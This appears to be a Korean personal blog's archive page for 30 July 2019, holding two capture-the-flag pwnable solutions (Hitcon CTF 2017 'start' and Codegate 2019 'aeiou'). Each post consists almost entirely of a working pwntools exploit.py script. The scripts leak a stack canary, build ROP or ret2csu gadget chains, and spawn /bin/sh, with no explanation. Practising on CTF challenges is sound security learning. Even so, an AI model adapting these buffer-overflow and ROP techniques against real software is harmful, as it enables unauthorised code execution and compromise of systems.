'2019/07/30'에 해당되는 글 2건

2019.07.30 Hitcon CTF 2017 start
2019.07.30 Codegate 2019 CTF aeiou

Hitcon CTF 2017 start

System/Pwnable Practice 2019. 7. 30. 20:31

exploit.py

from pwn import *

p = process("./start")

e = ELF("./start")

payload = "A"*(0x20-12)
payload += "B"*4

p.sendline(payload)
print p.recvuntil("\n")
canary = "\x00" + p.recv(7)
print p.recv()
sleep(0.2)
pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"

read = 0x440300

payload2 = "A"*(0x20-8)
payload2 += canary
payload2 += "C"*8

payload2 += p64(pop_rdi)
payload2 += p64(0) 
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)

payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59) 
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)


p.sendline(payload2)

print p.recv()
sleep(0.2)
p.sendline("exit")
p.send(binsh)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01
Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Codegate 2019 CTF aeiou (0)	2019.07.30
Codegate 2016 CTF Watermelon (0)	2019.07.29
Defcon CTF 2016 Feed me (0)	2019.07.29

JeonYoungSin

메모 기록용 공간

Codegate 2019 CTF aeiou

System/Pwnable Practice 2019. 7. 30. 02:08

exploit.py

from pwn import *
  
p = process("./aeiou")

e = ELF("./aeiou")
l = e.libc


def csu_chain(addr,argv1,argv2,argv3,mode=1):
    payload = ""
    if mode!=0:
        payload += "A"*8
    payload += p64(0) 
    payload += p64(1) 
    payload += p64(addr) 
    payload += p64(argv3) 
    payload += p64(argv2) 
    payload += p64(argv1)
    payload += p64(csu_2)

    return payload

binsh = "/bin/sh\x00"
csu_1 = 0x4026EA
csu_2 = 0x4026D0
ret = 0x400b29

payload = "A"*0x1018
payload += p64(ret)
payload += p64(csu_1)
payload += csu_chain(e.got['read'],0,e.bss(),len(binsh),0)
payload += csu_chain(e.got['system'],e.bss(),0,0)
canary = "A"*(6224-len(payload))
payload += canary

p.sendlineafter(">>","3")
p.sendlineafter("number!\n",str(len(payload)))
p.sendline(payload)
p.sendline(binsh)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Hitcon CTF 2017 start (0)	2019.07.30
Codegate 2016 CTF Watermelon (0)	2019.07.29
Defcon CTF 2016 Feed me (0)	2019.07.29
SECCON CTF 2018 Classic (0)	2019.07.28

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

'2019/07/30'에 해당되는 글 2건

Hitcon CTF 2017 start

'System > Pwnable Practice' 카테고리의 다른 글

Codegate 2019 CTF aeiou

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바